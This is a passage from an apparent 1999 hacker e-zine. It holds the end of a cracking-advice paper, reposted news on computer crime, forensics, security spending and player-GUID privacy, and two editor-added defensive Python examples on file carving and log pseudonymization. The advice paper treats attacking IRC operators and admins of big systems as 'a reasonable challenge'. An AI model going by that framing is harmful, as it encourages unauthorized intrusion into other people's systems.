   with lame names b) idiotic friends c) on the FBI blacklist - nothing
   besides that.

2) 'IRC War'. Groups like core, chrome, enforce, conflict, takeover, madcrew,
   phorce, tnt, etc. etc. who call themselves 'War' groups, are good for
   nothing. Why would you want to be a member of a group that attacks other
   similar groups and channels - it is comparable to the mafia - almost as
   violent, dangerous, except that you don't get rich. If you think you need
   'WarGroup' support for taking a channel with reasonable security, you are
   lame or you can't take a challenge. Think again.

3) Hacking related groups. Inform yourself about what happened to gH or
   'global Hell'. Most of these groups do the exact opposite of what is
   advised in this paper. If you get an offer to join: l0pht, cDc, MOD, thc,
   or ADM, take it because you'll learn a lot, all other groups are not worth
   your time.

4) IRC operators, BOFH, admin of big systems. Stay away from them until you
   are confidently prepared and willing to fight with them. Blindly attacking
   them can also be a waste of time, but it can also become a reasonable
   challenge.

Keep up to date:

The more you advance in cracking skills, or even might consider hacking,
programming or developing, the web probably gets the part of the web you use
least. Visit your favorite security related sites frequently, and make sure to
keep up to date about security breaches, law enforcement, exploits, changes in
the methods of crackers and admins.
My bookmarks certainly include Packetstorm security [6] and GeekGirl [7].

URLS:

[1] ftp://ftp.cdrom.com/pub/linux/distributions
[2] http://members.xoom.com/i0wnu/pgp.html
[3] http://www.nmap.org
[4] ftp://ftp.adm.isp.at/pub/ADM
[5] http://members.xoom.com/i0wnu/gateway.tgz
[6] http://www.genocide2600.com/~tattooman
[7] http://www.geek-girl.com

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBN2VcO7dkBvUb0vPhAQGtPgf+Iglo6ZZh7sF/WbeteyTGYaw0D9AJR4IH
A7hBo9AUwm3ZO7gDhdzLvDlOjXiMxhhJ2Jey/Y6M5Bb5LvZf8tK4EoUIF/UA8ifU
E6fd18zBDJep2LFaHyzXegA5oCWCYjpb3ZcFtbtpcA2He1hU85QUknOAHZ6lJyiV
JJZziWnXRkAcmRpzbLkTgVydisgugNwfYs9OJH/GNMCKQzeKB+MJrQ7wNlNOdV6T
7u4Jt1q1hW7P5p3xi6ETS196qQ7NO+46FqTEShk6HC+wl7EDwv8VTbz5lEGjBVXz
JEiIIAM5YfbGRbu65fTIlhI0u5N8OxKkX74HOGcBsInQlzuCNq6aMA==
=o8mY
-----END PGP SIGNATURE-----

@HWA

05.0 DOD Launches Computer Crime Lab
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by x-empt

The Department of Defense unveiled the newest high-tech crime laboratory last
Friday. Technology within the lab supposedly has the ability to "trace hackers
across the Internet", break encryption and rebuild cut up floppy diskettes. The
new Defense Computer Forensics Lab located near Baltimore MD, (very close to
NSA Headquarters) will be staffed by a team of 80 personnel to help investigate
espionage, murder and other crimes, as well as training other investigators.

San Jose Mercury News
http://www.sjmercury.com/svtech/news/breaking/ap/docs/890127l.htm

Posted at 3:21 p.m. PDT Friday, September 24, 1999

High-tech crime-fight Lab unveiled

BY TED BRIDIS
Associated Press Writer

LINTHICUM, Md. (AP) -- The Defense Department showed off its latest arsenal of
high-tech crime-fighting tools Friday, a $15 million computer lab where it can
trace hackers across the Internet, unscramble hidden files and rebuild smashed
floppy disks that were cut in pieces.
Investigators will use the new Defense Computer Forensics Lab, located in a
nondescript brick building south of Baltimore, to unravel electronic evidence
in cases of espionage, murder and other crimes involving America's military.

Using powerful computers and special software, these 80 digital detectives can
trace a hacker across the Internet to his keyboard, recover files thought to be
safely deleted and quickly search tens of thousands of documents for an
important phrase.

Cyberspace is ``a new kind of wild, lawless sort of frontier,'' said
Christopher Mellon, a deputy assistant Defense secretary. ``We have important
national interests, and we have to be able to function.''

Organizers envision sharing equipment and secret techniques they develop to
help FBI, state and local authorities prosecute criminals who use computers,
such as drug-dealers who track profits and customers with accounting software.

The FBI even established its own minilab upstairs in the building, though most
of its digital forensics work will continue to be performed in downtown
Washington at its headquarters.

``Virtually every white-collar crime case today brings at least one computer,
if not a whole network of computers,'' FBI Assistant Director Donald Kerr said.
``We need people who are well prepared.''

David Ferguson, the lab's director, showed how experts can use these high-tech
tools to enhance garbled audio recordings -- even digitally mute one voice in a
conversation to listen to another -- and recover computer files from disks and
tapes even if they had been deleted.

The lab can dissect virtually any type of computer, from handheld devices to
Apple computers to those using Windows or even specialized software. It's
developing a way to analyze all machines using a powerful assembly of
computers working together, called a ``Beowulf cluster,'' technology also used
by NASA and some Energy Department researchers.
One lab worker, David Lang, demonstrated how investigators can reassemble and
read from a computer's floppy disk that a criminal trying to hide evidence
might cut into pieces and crumple. The procedure, developed a decade ago but
still being perfected, takes ``a day if you're lucky, to a month if it's
something you haven't encountered before,'' Lang said. ``It's basically just a
jigsaw puzzle to be put back together.''

Ferguson expects to handle about 400 cases each year from all the military
branches, mostly crimes where a computer might have played part in espionage,
deaths or sexual assaults. About 10 percent of cases involve tracing hackers
snooping through military computers.

The new program also trains investigators, who will be assigned full time to
military posts and bases worldwide. Typical classes are three weeks of about a
dozen students learning about espionage, hackers, networks and special
computer hardware.

``What we intend to handle here is the big and large,'' Ferguson said, citing
examples where huge amounts of data need to be analyzed or where a
particularly savvy criminal scrambled his digital records and won't give up
his password.

Although Ferguson and others declined to discuss specific cases already under
way, they described as rare those involving encrypted files.

The White House agreed last week to allow sale of the most powerful
data-scrambling technology with virtually no restrictions, although military
and law enforcement officials have long warned that criminals and terrorists
might also use the technology.

Ferguson said he was confident that techniques to break those messages will be
adequate once Congress approves a proposal by the Clinton administration to
give the FBI $80 million over four years for the technology.

Defense Department officials also acknowledged that the lab's proximity to the
nearby National Security Agency, the government's premier code-breaking
organization, was a primary factor in deciding its location.
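The AP article twice mentions recovering files "thought to be safely deleted".
One of the standard techniques behind that is file carving, shown here as an
added example (editor's code, not from the lab or the article): deleting a
file normally removes only its directory entry, so the bytes stay on disk
until overwritten, and a carver walks the raw image looking for known header
and footer byte sequences. The disk image is constructed inline; the PNG is a
real minimal PNG, while the JPEG is only a header/footer stand-in, not a
decodable picture.

```python
"""Carving deleted files out of a raw disk image by their magic bytes.

Added example (not from the article): one of the techniques behind "recover
files thought to be safely deleted". Deleting a file usually removes only its
directory entry, so its bytes stay on disk until overwritten; a carver scans
the raw image for known headers and footers and cuts the files back out. The
image below is constructed inline; the JPEG is a header/footer stand-in, not
a decodable picture.
"""
import struct
import zlib

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PNG_END = b"IEND\xae\x42\x60\x82"   # IEND chunk type followed by its fixed CRC
JPEG_MAGIC = b"\xff\xd8\xff\xe0"   # SOI marker followed by an APP0 marker
JPEG_END = b"\xff\xd9"             # EOI marker

# file type -> (header, footer) pairs the carver knows about
SIGNATURES = {
    "png": (PNG_MAGIC, PNG_END),
    "jpeg": (JPEG_MAGIC, JPEG_END),
}


def make_png(width, height):
    """Build a minimal, valid 8-bit grayscale PNG (all-black pixels)."""
    def chunk(tag, data):
        crc = zlib.crc32(tag + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00" * width for _ in range(height))  # filter byte + row
    return (PNG_MAGIC + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(raw)) + chunk(b"IEND", b""))


def make_fake_jpeg():
    """Constructed JPEG-shaped blob: SOI/APP0 header, filler, EOI footer."""
    return JPEG_MAGIC + b"\x00\x10JFIF\x00" + b"\x11" * 40 + JPEG_END


def build_image():
    """Constructed raw image: zero-filled slack around two 'deleted' files."""
    return (b"\x00" * 512 + make_png(4, 2) + b"\x00" * 300
            + make_fake_jpeg() + b"\x00" * 200)


def carve(image):
    """Return carved files as dicts sorted by offset: type, offset, length, data."""
    found = []
    for kind, (header, footer) in SIGNATURES.items():
        start = 0
        while True:
            begin = image.find(header, start)
            if begin < 0:
                break
            end = image.find(footer, begin + len(header))
            if end < 0:
                break  # header without footer: truncated or overwritten
            end += len(footer)
            found.append({"type": kind, "offset": begin,
                          "length": end - begin, "data": image[begin:end]})
            start = end
    return sorted(found, key=lambda f: f["offset"])


if __name__ == "__main__":
    for f in carve(build_image()):
        print(f["type"], f["offset"], f["length"])
```

Real carvers go further (fragmented files, formats without a footer, length
fields inside the header), but the header/footer scan above is the core idea
and already explains why "deleted" is not the same as "gone".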
@HWA

06.0 IBM to Launch Security Chip
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Code Kid

IBM will unveil today a chip that will include features such as key encryption
and digital signatures. The PC 300PL will be the first IBM computer to include
the security chip. (Hmmm, Not a whole lot of information here. Can anyone find
a link to a data sheet or even the name of this chip? Will this thing
digitally 'sign' everything? Will the user be able to turn it off?)

PC World
http://www.pcworld.com/pcwtoday/article/0,1510,12997,00.html?cp=reuters

IBM Looks to Lock Down PC Security

Big Blue hopes its security chip will become a standard.

by Reuters
September 27, 1999, 8:23 a.m. PT

IBM plans to launch on Tuesday a security system that it hopes will set the
industry standard for protecting confidential documents, such as those used in
the growing area of electronic commerce.

Unlike previous security measures that rely on software "firewalls" that
filter out unauthorized users of information, IBM has developed a security
chip embedded within the computer hardware, which, it says, adds additional
levels of security.

"People from outside [of your organization] can get at your software," says
Anne Gardner, general manager of desktop systems for IBM. "People from the
outside can't get to your hardware."

The first IBM computer to include the security chip will be the PC 300PL. The
company plans to eventually include the security features in all of its
products. The chip will come installed in the hardware with no additional cost
to the customer, Gardner says.

The features of the security chip include key encryption, which encodes text
messages, and "digital signatures," which act as unique "watermarks" that
identify the sender of the document.

Share and Share Alike

"We want this to become an industry standard," IBM's Gardner says. "We want
this on as many desktops as possible."
Asked if IBM would share the technology with competing hardware makers, she
says, "You may see something along those lines in the future." She declines to
be more specific.

"It's a good strategy not to try to clutch this technology and try to make
money," says Roger Kay, an analyst at International Data Corporation. "It's a
good strategy to give it away and try to get as many people to go for it as
possible. IBM doesn't want this to be proprietary. They want it to be
ubiquitous."

Kay calls the development "a good first step" toward making people more
comfortable doing business over the Internet.

"Over the next two years you're going to see an increased focus on security as
more people do business over the Web," says Joseph Ferlazzo, vice president of
syndicated services for Technology Business Research.

"It's essential to have a verifiable digital signature that will allow
companies to engage in business transactions," he adds. "What IBM is trying to
do is make this an essential part of computer configurations going forward so
that the capability will already be inside the computer."

@HWA

07.0 Law Firm Sued Over Possible Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond

Moore Publishing of Pennsylvania is seeking more than $800,000 in damages from
the Washington based legal firm of Steptoe & Johnson. The suit alleges that an
employee of Steptoe & Johnson attempted to break in to the computer systems of
Moore Publishing. Steptoe has vehemently denied the charges but Moore claims
that they have logs that will prove their case.

Washington Post
http://search.washingtonpost.com/wp-srv/WPlate/1999-09/20/018l-092099-idx.html

Monday Morning

Monday, September 20, 1999; Page F03

DID YOU HEAR? . . .

"It was probably the biggest disappointment I had in years of economic
development [work] because it seemed so winnable."

-- Richard Monteilh, former D.C. economic development official, on losing MCI
WorldCom Inc. operations to Loudoun County.

Tracking a Hacking

Plenty of lawyers have been called hacks, but lawyers at Steptoe & Johnson are
among the first to be called hackers.

Seeking more than $800,000 in damages, Moore Publishing of Pennsylvania sued
the blue-chip Washington firm for allegedly trying to sneak into one of the
company's Internet domains. The lawsuit, filed last week, alleges that someone
at Steptoe -- they're not sure who -- tried to hack into the site eight times
in August.

"The attempt did not display the mark of genius," said Rodney Sweetland, the
Arlington solo practitioner suing on Moore's behalf. "Whoever did this knew
something about hacking, but not enough to cover their tracks."

Steptoe officials say the suit is completely baseless and that they'll fight
it vigorously. The firm has already rebuffed an overture to settle the matter
out of court.

Sweetland claims that computer logs will prove his case, but he offered only a
sketchy explanation of Steptoe's possible motives. Moore's primary business is
digging up electronic data for companies conducting asset searches, but it has
a sideline as a cyber-squatter. It has purchased the rights to the Internet
domain names of a handful of law firms, apparently hoping to resell those
rights at a later date. Among the names it owns: Steptoejohnson.com.

Still, it's unclear why any Steptoe employee would care. The firm already has
a Web site at steptoe.com.

-- David Segal

@HWA

08.0 Danish Man Sentenced for Intrusion Attempt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by root

A man, whose name has not been released, has received a two year suspended
sentence for attempting to break into the personal computer of the head of the
Copenhagen police's special computer crime unit. The illegal activities took
place in January of this year. The judge in the case did not follow the
prosecution's suggestions to confiscate the accused's computer equipment.
Phoz.dk
http://www.phoz.dk/news/en/bo_trial.html

HNN Archive for January 25, 1999
http://www.hackernews.com/arch.html?012599

Phoz.dk - news

20-year old hacked police officer's computer

This is the newest article, covering the actual sentence

"It may sound silly but I did it to help other people". With a low voice,
clearly nervous, a 20-year old man explained Wednesday in a Copenhagen
courtroom how he in January 1999 hacked two different private computers. He
did this using a tool that via the Internet searches for machines infected
with a certain trojan. The attacker was earlier a victim of the same tool so
it came naturally to warn others against it.

"I now realise that this is illegal. I wasn't certain back then", said the
young hacker who didn't destroy anything during his hacking attempts.

He got a suspended sentence with no limitations and a trial time for two
years. The judge didn't follow the prosecutor's suggestions that the hacker's
computer equipment should be confiscated by the police. "You have probably got
enough warnings," judge Henrik Bitsch said.

The 20-year old hacker was uncovered when he tried hacking a computer based in
the home of a police officer. An anti-virus tool identified the intruder and
led the police to his house.

...

Danish Hacker Picks Wrong Victim

The first article, don't remember who the author was.

COPENHAGEN, Denmark (Jan. 22, 1999) - A 19-year-old Danish student picked the
wrong victim when he hacked his way into a home computer. He was arrested
Thursday by the machine's owner - the head of the Copenhagen police's special
computer crime unit.

Detective Arne Gammelgaard had installed an anti-virus program in his computer
at home. On Sunday, it warned him about an intruder and enabled him to gather
information about the visitor.

Gammelgaard investigated and an Internet provider helped track the hacker.

The student, whose name was not released, confessed to hacking and said he
randomly picked the cyber-cop.
The hacker was released after he was charged with ``unauthorized access to
another person's documents or programs.'' The maximum penalty is six months'
imprisonment.

@HWA

09.0 DOE to Spend $80mil on Info Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Sarge

The Department of Energy will spend $80 million over the next two years to
create a security net for its systems. A four point plan covering policy,
personnel, operational and technical requirements has been approved by DOE
senior management. This new plan comes soon after the Los Alamos espionage
scandal. ($80 million? Damn that's a lot of dough.)

Government Computer News
http://www.gcn.com/vol18_no32/news/700-1.html

September 27, 1999

DOE sets security course

Department will allot $80 million to bolstering data controls

By Frank Tiboni
GCN Staff

The Energy Department will spend $80 million over the next two years to create
a security net for its systems, chief information officer John Gilligan said
of the cybersecurity plan he will roll out departmentwide next month.

The four-point plan calls for sweeping changes in how the department protects
its data resources, Gilligan said. He said the plan’s four areas address
policy, personnel, operational and technical requirements. He submitted the
plan to Energy senior management late last month and got the green light to
begin work immediately.

To make sure that new security initiatives take hold beyond department
headquarters, Gilligan has asked field sites to designate CIOs or equivalent
officials as lead security officers.

The obvious first step is awareness, Gilligan said, so a major component of
the plan is training and education. The department will begin a two-year, $2
million multimedia program right away, he said.

Secretary Bill Richardson initiated several security reforms in the wake of
the Los Alamos espionage scandal, including giving computer security oversight
to Gilligan [GCN, May 24, Page 1].
A central component of Richardson’s reform package directs Gilligan to improve
the security of information that is stored, processed or transmitted by Energy
systems. The reforms also realigned the CIO’s office under the new Office of
Security and Emergency Operations, which is headed by former Air Force Gen.
Eugene E. Habiger [GCN, June 28, Page 1].

The 47-page systems security plan—which Gilligan’s staff had been working on
since mid-May with help from Booz, Allen & Hamilton Inc. of McLean, Va.,
Electronic Data Systems Corp. and Mitre Corp. of Bedford, Mass.—details
ongoing and planned activities. Gilligan said the department will use it as a
cybersecurity road map for the next five years.

“It’s a sound plan that’s comprehensive, addresses needs and is doable,” he
said. “It will clearly allow us to achieve a significant improvement in
computer security in the next two years.”

Gilligan said he will coordinate the execution of the plan through the
department’s Field Management Council.

During Phase 1, which takes place from October through December, more than
1,000 systems administrators and managers at the department’s national
laboratories will undergo training in network security, system-specific
configuration planning, Web server security, mail server security and
cybersecurity policies for managers.

Following up on that initial training, Energy will broaden its program to
ensure that appropriate training is given to all DOE personnel and contractors
within the next two years. The training will cover the security requirements
for all systems—those that handle classified information as well as those
that handle unclassified data.

Gilligan said another effort will be to improve security operations in the
department. Energy will spend $45 million of the $80 million it is setting
aside for systems security through fiscal 2001 on bolstering program
management, monitoring ability and protection know-how.
As part of this effort, Energy will expand the staff of its Computer Incident
Advisory Capability at the Lawrence Livermore National Laboratory in
Livermore, Calif., from seven to 25 people over the next year.

CIAC will be Energy’s first line of defense. It will spearhead intrusion
assessment, warning and response, and the day-to-day monitoring of department
systems and networks, Gilligan said.

@HWA

10.0 The Army Wants to Eliminate Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Sarge

The US Army wants to reduce or eliminate password use by using biometric
alternatives for access to computer and weapons systems. The Army wants unique
identifiers that cannot be stolen or forgotten and is looking to biometrics as
the answer. The Army is currently conducting a study that will consider the
legal and sociological implications as well as logistical issues surrounding
large-scale biometric recognition.

Government Computer News
http://www.gcn.com/vol18_no32/news/702-1.html

September 27, 1999

The service wants to eliminate passwords for verifying users

By Patricia Daukantas
GCN Staff

The Army will investigate biometric recognition devices as a way to reduce or
eliminate password use for accessing computer and weapons systems.

Commercial biometrics can be leveraged for military systems, said Phillip
Loranger, a division chief at the Army Information System Security Office in
the Directorate of Information Systems for Command, Control, Communications
and Computers.

The Army wants soldiers to have unique identifiers that cannot be stolen or
forgotten. “We need to dump the way we do passwords,” Loranger said this month
at a meeting of the Biometric Consortium in Arlington, Va.

The service approved the study early this month and is kicking it off with
fiscal 1999 year-end funds. Loranger declined to put a price on the effort,
which he will lead.
He said the study, slated for completion by spring, will consider the legal
and sociological implications and the feasibility of large-scale biometric
recognition for Army systems.

Iris recognition, in which an imaging system scans the pattern of an eye’s
iris, will be the first technology studied. It has an edge over fingerprint
and voice recognition, Loranger said, because it works even when someone is
wearing protective headgear.

“Voice doesn’t work through a gas mask,” Loranger said. “Fingerprints can’t be
taken through rubber gloves.”

He said recent innovations allow iris recognition through plastic face shields
and eyeglasses. The system uses a small imaging device, not unlike a digital
camera, that plugs into a PC and compares a user’s iris image against stored
patterns of known users.

The study will also examine fingerprint and voice recognition. Loranger said
the Army already collects soldiers’ fingerprints. The recognition tools for
desktop PCs cost $100 to $2,000, he said, and can be built into keyboards,
mice and notebook computers.

Voice recognition systems can work either at desktop systems or over dial-up
lines, requiring only a microphone and a sound card.

The study will examine setting up an Army or Defense Department center for
biometric technology. “You couldn’t find a better test bed anywhere” than the
Army, Loranger said, because its computers run at least 17 operating systems,
including legacy OSes.

Too hard

He acknowledged that some systems still will require passwords, at least with
today’s technology. But asking soldiers to remember multiple eight-digit,
randomly generated pass codes is “hard security,” Loranger said. “The easier
you make reliable security, the better that security will be.”

He said he is more interested in integrating off-the-shelf technology into
military systems than in conducting an extensive development effort from
scratch.
Loranger said he envisions a time when biometric recognition will even be
integrated into the handgrips of guns to prevent unauthorized use. “All it
takes is time and money,” he said.

@HWA

11.0 MediaPlayer and RealPlayer send GUID's to internet sites
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by FProphet

http://www.junkbusters.com/ht/en/new.html
http://www.seattleweekly.com/features/9914/tech-fefer.shtml

Media Player and privacy

BY MARK D. FEFER

ONE PLACE WHERE RealNetworks and Microsoft are unlikely to compete is on the
issue of privacy. There has been a flurry of controversy lately over uniquely
identifying numbers embedded in Intel's new Pentium III chip and Microsoft's
Windows 98 operating system. To quell the outrage, Intel has introduced
software that will allow computer users to hide the chip's unique serial
number, so that it can't be used to track users' Web behavior. And Microsoft
has pledged that it will no longer collect a number known as the Globally
Unique Identifier, or GUID, when registering Windows 98 users.

All the while, however, people who use streaming media have already been
tagged with such a unique, identifying number. Seattle Weekly has learned that
both the RealNetworks' RealPlayer and the Windows Media Player carry GUIDs,
and those numbers are transmitted to any site where you access a streaming
file. This opens up at least the possibility of a database in which all your
streaming media use can be recorded (though there is no indication that such a
database exists).

Gary Schare, Microsoft's lead product manager for Windows Media Technologies,
confirms that each Media Player carries a GUID. But he says the company keeps
no database with those numbers and does not track individual Media Player
usage.

RealNetworks officials did not respond to numerous requests from Seattle
Weekly to discuss the subject of GUIDs.
But executives in the business of tracking Web usage say that the RealPlayer,
too, carries an identifying code. And RealNetworks, unlike Microsoft, requires
you to submit your name and e-mail address before allowing you to download the
player.

Every time you click onto a Web page, a variety of information about you is
automatically recorded in the site's "log files"--information such as what
kind of browser you use, what page you were last visiting, how long you stayed
at the site, etc. If you use a media player at the site, your media-streaming
activities are also recorded, along with your player's ID number.

Bill Piwonka, a product manager at Portland-based WebTrends, which makes the
leading software program for sorting and analyzing log files, says that
although media player GUIDs appear in the files, WebTrends does not actually
compile those ID numbers or present them in its reports. "WebTrends doesn't do
anything with the number," he says. "We're not really sure what it's there for
or how it's used."

On the other hand, Piwonka notes, "There's no way for us to know if Microsoft
or Real have put something in there that helps them track." Computer
programmer Richard M. Smith, the head of Phar Lap Software, who first drew
attention to the Windows 98 GUID last month, says the only way to find out
would be to "put a 'packet sniffer' on, and see what's going down the wire"
when you call up a media stream.

But Gary Schare of Microsoft insists that "the only place [the GUID] appears
is in the log files. We don't ever pass that information around, or back to
Microsoft in any way." Schare says the only contact between the player and
Microsoft is through "our upgrade mechanism," whereby a player will "ping" the
Microsoft server, and you'll be automatically "reminded" to upgrade if you
don't have the current Player version. But even that mechanism, while in
place, has not been activated, Schare says.

So why is the GUID even there?
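The article's concrete point is that the player GUID lands in the site's
access logs, where anyone who keeps those logs can correlate a person's
streaming history. The following added example (editor's code, not from the
article, Microsoft or RealNetworks) shows what a site operator can do about
that before retaining logs: find GUID-shaped tokens in Combined Log Format
lines and replace each with a keyed HMAC pseudonym, so distinct players can
still be counted for statistics while the raw identifier is never stored. The
log lines, the IP addresses (192.0.2.0/24 is a documentation range) and the
key are all constructed; placing the GUID in braces inside the user-agent
string is an assumption about the log format, not something the article
specifies.

```python
"""Finding and pseudonymizing player GUIDs in web server log lines.

Added example (not from the article): the GUIDs the article describes end up
in the site's access logs, so a log owner who keeps logs for statistics can
remove the raw identifier before retention. A keyed HMAC replaces each GUID
with a stable token, so "distinct players" can still be counted without the
real identifier ever being stored. The log lines and the key are constructed;
the GUID placement in the user-agent is an assumption about the format.
"""
import hashlib
import hmac
import re

# RFC 4122 textual form, optionally wrapped in the braces Windows often prints.
GUID_RE = re.compile(
    r"\{?([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})\}?",
    re.IGNORECASE,
)

# Constructed sample in Combined Log Format (192.0.2.0/24 is a documentation range).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Apr/1999:10:01:22 -0700] "GET /stream/show.asx HTTP/1.0" '
    '200 4012 "-" "NSPlayer/4.1.0.3856 {7f2a4c1e-3b9d-4a21-9c5e-0d2f8e6b1a33}"',
    '192.0.2.11 - - [12/Apr/1999:10:02:05 -0700] "GET /stream/show.asx HTTP/1.0" '
    '200 4012 "-" "NSPlayer/4.1.0.3856 {0c9e2b7a-51d4-4f0e-8a6b-3e7d1c2f9a44}"',
    '192.0.2.10 - - [12/Apr/1999:10:09:41 -0700] "GET /stream/other.asx HTTP/1.0" '
    '200 2210 "-" "NSPlayer/4.1.0.3856 {7F2A4C1E-3B9D-4A21-9C5E-0D2F8E6B1A33}"',
    '192.0.2.12 - - [12/Apr/1999:10:10:00 -0700] "GET /index.html HTTP/1.0" '
    '200 1024 "-" "Mozilla/4.5 [en] (X11; I; Linux 2.2.10 i686)"',
]


def pseudonymize(guid, key):
    """Map a GUID to a stable, keyed token; without the key it cannot be reversed."""
    digest = hmac.new(key, guid.lower().encode(), hashlib.sha256).hexdigest()
    return "guid:" + digest[:16]


def scrub_line(line, key):
    """Replace every GUID in one log line; return (new_line, number_replaced)."""
    return GUID_RE.subn(lambda m: pseudonymize(m.group(1), key), line)


def scrub_log(lines, key):
    """Scrub a whole log; return (scrubbed_lines, total_guids, distinct_tokens)."""
    out, total, tokens = [], 0, set()
    for line in lines:
        new, n = scrub_line(line, key)
        out.append(new)
        total += n
        for guid in GUID_RE.findall(line):
            tokens.add(pseudonymize(guid, key))
    return out, total, sorted(tokens)


if __name__ == "__main__":
    scrubbed, count, distinct = scrub_log(SAMPLE_LOG, b"constructed-demo-key")
    print(count, "GUIDs replaced,", len(distinct), "distinct players")
    for line in scrubbed:
        print(line)
```

The key must be kept separately from the logs and rotated on a schedule;
rotating it breaks cross-period correlation on purpose, which is usually the
right trade-off for usage statistics. Dropping the tokens entirely is simpler
still when no per-player count is needed.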
At press time, Schare said he did not know the technical justification. "I know there's a good reason. We don't just stick stuff like that in randomly."

Jason Catlett, who runs the privacy watchdog Junkbusters, speculates that the GUID could be useful for apprehending copyright violators. Just as the Windows 98 GUID is imprinted in documents created with Microsoft Office, the GUID from your player could be imprinted into the media file, Catlett speculates, and that could help track down the source of any unauthorized copying. But Schare contends that streaming files are untouched. "It's read only. There's no tracking in a piece of content as to who's played this. That doesn't occur."

@HWA

12.0 GTE accidentally sends unlisted numbers to telemarketers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by FProphet

http://www.junkbusters.com/ht/en/new.html

California's second-largest telephone company included about 50,000 unlisted numbers and addresses in the lists that they routinely sell to telemarketers, AP reported. (1998/4/17)

@HWA

13.0 ``Relationship Marketing?'' We have to talk...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by FProphet

http://www.junkbusters.com/ht/en/new.html

Susan Fournier, author of Preventing the Premature Death of Relationship Marketing, has found that ``consumers are growing irritated and overwhelmed by the personal information being gathered about them in the name of direct marketing. One woman recently canceled her supermarket loyalty card after she received a personalized letter reminding her that it was time she bought more tampons.'' -- The Economist (1998/3/14, p. 68)

@HWA

14.0 News and views from SLa5H
~~~~~~~~~~~~~~~~~~~~~~~~~

* N E W S B Y S L a 5 H *
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

If you would like to contribute something contact me (smuddo@yahoo.com) or Cruciphux at cruciphux@dok.org. Also check out my site at: http://members.xoom.com/_XOOM/dao32/

Content
~~~~~~~

1. HOT NEWS
   - Hacker Pleads Guilty To Grade-Fixing
   - Are Eastern Europe's Banks Being Cracked?
   - Implementing Security Measures
   - Activists Pull Stunt To Show Crypto Holes
   - U.S., Network Solutions Reach Agreement
   - CMGI to acquire free ISP 1stUp
   - Microsoft - ActiveX Holes
   - Privacy Groups Wary Of Encryption Reforms
   - Wild Wild Web
   - Desperate countdown to ready Cold War remnants for Y2K
   - Computer wizards crack code in worldwide challenge
   - U.S. finds malicious code changes in Y2K "fixes"
   - Financial firms create Net crime watch
   - SEC investigates NetRoadshow security breach
   - Court to revisit encryption ruling
   - Microsoft Patches IE Security.....Again
   - Justice Dept. Funds Antihacking Campaign
   - Quantum confidential
   - Online Credit Card Security Fears Waning, But Still a Factor
   - India: Code-Smuggling? Absurd
2. SPECIAL
   - Hacking in 1999 | Current state of hacking
3. VULNERABILITIES
   - Linux Kernel 2.2.x ISN Vulnerability
4. READING MATERIAL
   - Mastering Network Security
   - Cisco IOS Network Security
   - Cryptography and Network Security : Principles and Practice
   - Internet Security : Professional Reference

1. H O T N E W S
~~~~~~~~~~~~~~

Hacker Pleads Guilty To Grade-Fixing
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

An 18-year-old computer hacker who boosted grades for fellow high school students in exchange for money has pleaded guilty to one count of felony computer trespass. Sentencing for Adam R. Jerome was scheduled for Oct. 7 in Clark County Superior Court. Jerome's accomplice in the crime, Phillip J. Latimer, also 18, pleaded guilty Friday to a lesser charge of misdemeanor computer trespass.

"Mr. Latimer was essentially the marketing person for Mr. Jerome's services," deputy prosecutor Beau Harlan told Judge Barbara Johnson. Latimer collected between $2 and $80 from 22 Evergreen High School students, most of them seniors, who wanted their transcripts altered. He was handed a 30-day sentence -- two days in Clark County Jail and 28 days on work crew -- and will be on probation for one year.

Harlan said he'll recommend a 90-day sentence for Jerome, who was on juvenile probation for burglary when he hacked into the school district's computer system. Jerome altered 31 transcripts in all, Harlan said. Word of the grade-boosting surfaced in April. Jerome and Latimer were charged in June. School officials estimate it will cost more than $15,000 to upgrade the security on the computer system, Harlan said. Latimer and Jerome will be ordered to pay restitution.

Jerome's lawyer, Jon McMullen, said his client had no idea hacking into the school's computer system was a felony. "He knew what he was doing was wrong, but it's a question of how wrong," McMullen said. "He thought he might be expelled, but not labeled a felon for the rest of his life."

Latimer, who has no prior criminal record, said the hacking started as a prank. "To this day I can't really say why I did it," Latimer said. "I just honestly know it was a mistake."

Prosecutors decided not to charge the students who paid to have their grades changed. They were suspended from school for 10 days.

Are Eastern Europe's Banks Being Cracked?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A few weeks ago, marketing companies in the Czech Republic received an anonymous e-mail from a self-proclaimed computer security expert. The e-mail's author boasted of having just penetrated the system of the largest bank in the country. The network cracker was offering to sell to the marketing firms information about Ceska Sporitelna's 2.5 million customers including where they worked, how much they made and their account numbers.
